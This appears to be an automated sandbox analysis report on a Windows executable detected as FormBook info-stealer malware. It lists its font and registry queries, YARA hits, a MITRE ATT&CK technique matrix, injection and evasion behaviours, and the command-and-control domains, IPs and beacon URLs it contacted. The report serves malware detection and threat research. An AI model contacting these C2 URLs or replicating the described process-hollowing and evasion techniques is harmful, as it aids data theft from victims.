          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502358 Sample: 56460021473877.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 34 www.serviciosgeneralesjba.online 2->34 36 www.sapphiremodule.com 2->36 38 serviciosgeneralesjba.online 2->38 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Multi AV Scanner detection for domain / URL 2->44 46 Found malware configuration 2->46 48 6 other signatures 2->48 11 56460021473877.exe 3 2->11         started        signatures3 process4 signatures5 58 Tries to detect virtualization through RDTSC time measurements 11->58 60 Injects a PE file into a foreign processes 11->60 14 56460021473877.exe 11->14         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 17 explorer.exe 14->17 injected process8 dnsIp9 28 rajinderbeas.com 216.10.241.4, 49831, 80 PUBLIC-DOMAIN-REGISTRYUS India 17->28 30 www.box-770.com 213.186.33.5, 49833, 80 OVHFR France 17->30 32 13 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 control.exe 17->21         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 21->50 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.56460021473877.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          serviciosgeneralesjba.online6%VirustotalBrowse
          www.sapphiremodule.com1%VirustotalBrowse
          txsports.club1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.txsports.club/ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.rajinderbeas.com/ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comceomz0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.nhmingwei.com/ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU0%Avira URL Cloudsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3S0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.box-770.com/ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU0%Avira URL Cloudsafe
          http://www.celltecstore.com/ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          www.nottryingdoing.com/ni8b/0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          serviciosgeneralesjba.online
          68.65.120.219
          truetrueunknown
          www.sapphiremodule.com
          44.227.65.245
          truetrueunknown
          www.nhmingwei.com
          154.208.173.144
          truetrue
            unknown
            txsports.club
            148.72.177.185
            truetrueunknown
            rajinderbeas.com
            216.10.241.4
            truetrue
              unknown
              thecrystalconsciousness.com
              31.170.167.144
              truetrue
                unknown
                ps-sac.com
                67.205.83.103
                truetrue
                  unknown
                  www.box-770.com
                  213.186.33.5
                  truetrue
                    unknown
                    mitiendanube.com
                    52.5.157.71
                    truefalse
                      high
                      www.txsports.club
                      unknown
                      unknowntrue
                        unknown
                        www.eastsidescooters.com
                        unknown
                        unknowntrue
                          unknown
                          www.celltecstore.com
                          unknown
                          unknowntrue
                            unknown
                            www.rajinderbeas.com
                            unknown
                            unknowntrue
                              unknown
                              www.thecrystalconsciousness.com
                              unknown
                              unknowntrue
                                unknown
                                www.ps-sac.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.serviciosgeneralesjba.online
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.ville-fogalmam.com
                                    unknown
                                    unknowntrue
                                      unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.txsports.club/ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdUtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.rajinderbeas.com/ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdUtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.nhmingwei.com/ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdUtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.box-770.com/ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdUtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.celltecstore.com/ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdUtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdUtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      www.nottryingdoing.com/ni8b/true
                                      • Avira URL Cloud: safe
                                      low

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.apache.org/licenses/LICENSE-2.056460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designersG56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers/?56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/bThe56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers?56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.tiro.com56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comceomz56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.goodfont.co.kr56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.coma56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.collada.org/2005/11/COLLADASchema9Done56460021473877.exe, 00000000.00000002.699621675.0000000006A60000.00000004.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.coml56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3Scontrol.exe, 00000008.00000002.941761338.0000000004CE2000.00000004.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sajatypeworks.com56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netD56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlN56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/cThe56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htm56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fontfabrik.com56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-user.html56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/DPlease56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers856460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                        high
